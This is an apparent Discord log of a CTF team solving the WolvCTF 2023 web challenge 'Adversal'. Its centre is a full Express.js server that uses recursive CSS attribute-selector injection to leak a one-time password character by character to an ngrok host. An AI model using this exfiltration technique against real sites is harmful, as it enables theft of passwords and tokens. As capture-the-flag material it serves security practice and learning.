Project Sekai
🔒 WolvCTF 2023 / ✅-web-adversal
Avatar
Adversal - 500 points
Category: Web
Description: I added advertisements to my web application to serve one time passwords! I'm sure ads are secure, right?
https://adversal-tlejfksioa-ul.a.run.app
Files:
Tags: Nolan1324#4645
Sutx pinned a message to this channel. 03/17/2023 1:00 PM
Avatar
@irogir wants to collaborate 🤝
Avatar
@Violin wants to collaborate 🤝
Avatar
@strellic wants to collaborate 🤝
Avatar
i dont want to look at the php one ngl
20:43
so
Avatar
yeah php is 💀
Avatar
script-src 'none'; object-src 'none'; connect-src 'self';
20:44
css inj to leak
20:44
cringe
20:44
i dont want to impl
20:44
aaaaaaaa
20:50
trying to find a previous css inj script
🥹 1
20:50
pain
20:51
fk ill just write it
20:51
cringe (edited)
Avatar
strellic
used /ctf solve
✅ Challenge solved.
Avatar
```js
const express = require("express");
const app = express();

const reqMap = new Map();
const HOST = "https://4067-23-93-70-105.ngrok.io";
const ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPRSTUVWXYZ0123456789";
let known = "";

const getCSS = (n) =>
  ALPHABET.split("")
    .map(c => `input[value^='${known + c}']${":nth-child(3)".repeat(n)} { background: url(${HOST}/leak/${n + 1}/${c}); }`)
    .join("\n");

app.use((req, res, next) => {
  console.log(known, req.originalUrl);
  next();
});

app.get("/css/:n", (req, res) => {
  res.setHeader("Content-Type", "text/css");
  if (req.params.n === "0") {
    res.send(getCSS(0));
    return;
  }
  reqMap.set(parseInt(req.params.n), res);
});

app.get("/leak/:n/:c", (req, res) => {
  let { n, c } = req.params;
  known += c;
  n = parseInt(n);
  if (reqMap.has(n)) {
    reqMap.get(n).send(getCSS(n));
  }
  res.send("lmfao");
});

app.listen(42069);
```
Avatar
goddd
Avatar
could i note it out so others can see too
Avatar
sure
Avatar
wait lmao
21:52
Description: The admin will not be fooled by redirects anymore! So the ads are definitely secure now, right?
Avatar
bruh
21:54
should be fine
21:54
i think the other team cheesed it somehow? idk
21:54
challenge not up
21:54
huh
21:55
yknow i didnt even look at the code that hard
21:55
i can definitely see what happened tho
Avatar
incoming insta blood? lmao
Avatar
did they just remove the chall
21:58
i had the flag
21:59
solved
21:59
zzz
21:59
ez 1000 points
Avatar
🛐 promax
Exported 41 message(s)